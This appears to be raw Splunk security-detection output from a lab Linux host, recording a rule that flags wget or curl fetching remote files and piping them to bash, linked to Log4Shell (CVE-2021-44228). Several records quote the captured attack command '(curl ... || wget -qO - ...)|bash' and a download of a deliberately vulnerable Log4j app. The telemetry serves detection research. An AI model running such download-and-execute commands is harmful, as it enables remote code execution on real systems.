annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
